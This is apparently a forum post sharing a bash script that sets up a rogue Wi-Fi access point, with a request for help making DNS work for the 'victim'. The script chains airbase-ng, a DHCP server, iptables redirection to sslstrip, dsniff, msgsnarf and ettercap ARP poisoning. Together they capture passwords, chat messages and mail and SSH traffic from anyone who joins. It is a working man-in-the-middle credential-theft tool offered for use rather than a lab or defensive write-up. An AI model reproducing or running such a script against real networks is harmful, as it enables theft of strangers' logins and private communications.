Hey guys
I was getting tired of typing all the commands in constantly, so I made a little bash script for it. It is made for Ubuntu, so a few changes will be needed; for example, BT uses dhpcd instead of dhcpd3.
Now the problem: a lot of the time the other computers don't see the wireless network when it is applied to the mon interface (or similar).
### edit ###
Found that the problem only occurs with Windows XP.
Now the only thing that doesn't work (yet?) is the DNS service: the victim can't resolve DNS names but can access IP addresses directly.
Is there anyone here who has more experience with soft APs and is willing to help me?
Code:#!/bin/bash # SoftAP for wireless-testing # Modded by Junke1990 # # Hardware: Eee PC 1000h # NICs # eth0 (LAN) # ra0 (WLAN) rt2860STA # wlan1 (USB WLAN) RTL8170L # dealextreme sku.27963 # init sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py' # services to listen on dsn=1 ims=0 msg=1 # Make sure only root can run our script if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi modprobe tun sleep 1 echo "[>] Starting: Soft AP - Junke1990" # get interface and mac list i=0 iflist=() maclist=() while read -r if mac; do iflist[i]=$if maclist[i]=$mac ((i++)) done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}') for i in "${!iflist[@]}"; do echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" done echo -n "[?] Select your inet conn. [#] " read j intI=${iflist[j]} # select SoftAP adapter for i in "${!iflist[@]}"; do if [ $j != $i ]; then echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}" fi done echo -n "[?] Select your SoftAP adapter. [#] " read j intAP=${iflist[j]} # MAC address intAP_MAC=${maclist[j]} echo "[+] Gathering network info..." # info inet conn intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'` intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"` intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2` intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1` # converting netmask in to netmask length echo "[+] Calc'ing network mask..." 
NETMASK=$intI_mask MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'` MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'` MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'` MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'` BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m` MASK=$(( BM1 + BM2 + BM3 + BM4)) intI_mask_nb=$MASK # enter wireless essid name echo -n "[?] Enter the desired name for wireless network: "; read ssid # prepare interface / softap #wlanconfig $intAP destroy #wlanconfig $intAP create wlanmode mon wlandev wifi0 if [ `echo $intAP || grep 'mon' ` ]; then intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`; fi echo "[+] Setting up fake AP..."; sleep 1; xterm -geometry 75x15 -e airbase-ng -W 1 -w "1234567890" -c 6 -e "$ssid" -a $intAP_MAC $intAP & sleep 1; ifconfig at0 up ifconfig at0 192.168.3.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route add -net $intI_netw netmask $intI_mask gw $intI_gw route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1 # monitor #xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP & #xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3 echo "[+] Killing dhcpd and dnsmasq..." # do this quiet for when the process isn't running killall -q dhcpd3 killall -q dnsmasq echo "[+] Setting up DHCP config..." 
# create custom dhcpd.conf for WLAN cat > dhcpd.conf << EOF ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.3.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.3.255; option routers 192.168.3.1; option domain-name-servers 192.168.3.1; option domain-name-servers 208.67.222.222; option domain-name-servers 208.67.220.220; range 192.168.3.10 192.168.3.254; } EOF echo "[+] Cleaning up IP tables..." # iptables cleanup iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo "[+] Setting up forwarding tables..." # iptables iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic #iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router #iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN # ip fwd enable echo 1 > /proc/sys/net/ipv4/ip_forward # start dhcp server for subnet # edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied echo "[+] Setting up DHCP server..." xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 & # restart dnsmasq echo "[+] Setting up dnsmasq..." dnsmasq ### python-twisted-web2 required!!! if [ -f $sslstrip ]; then echo "[+] Setting up sslstrip..." xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 & xterm -e tail -f sslstrip.log & xterm -e "tail -f sslstrip.log |grep 'pass' "& sleep 1 else echo "[-] SSLStrip not found..." echo 'Edit $sslstrip to the correct path.' 
fi # DSniff if [ $dsn == 1 ]; then if which dsniff >/dev/null; then echo "[+] Setting up dsniff..." xterm -e dsniff -i at0 -m & sleep 1 fi else echo "[-] DSniff not started..." fi # IMSniff - MSN only if [ $ims == 1 ]; then if which imsniff >/dev/null; then if [ ! -d 'IMlog' ]; then mkdir IMlog fi # gives a lot of unknown content err's xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& sleep 1 fi else echo "[-] IMSniff not started..." fi # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo if [ $msg == 1 ]; then if which msgsnarf >/dev/null; then echo "[+] Setting up msgsnarf..." xterm -e msgsnarf -i at0 & sleep 1 fi else echo "[-] MSGSnarf not started..." fi # ettercap TCP Ports # IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS) # POP3 - 110/TCP 995/TCP # SMTP - 25/TCP 465/TCP # SSL - 443/TCP # HTTP - 80/TCP # SSH - 22/TCP # MSN - 1863/TCP # Yahoo - 5050/TCP - nobody interesting uses yahoo... # ICQ - 5190/TCP - nobody at all uses ICQ xD sleep 1 echo "[+] Setting up ettercap..." xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 & sleep 1 # ip_forward # as last to avoid reset echo "[+] Enabling IP forward..." echo "1" > /proc/sys/net/ipv4/ip_forward chk=`cat /proc/sys/net/ipv4/ip_forward` if [ $chk != "1" ]; then echo "Can't enable ip_forward" fi echo "[x] All done! have fun!"


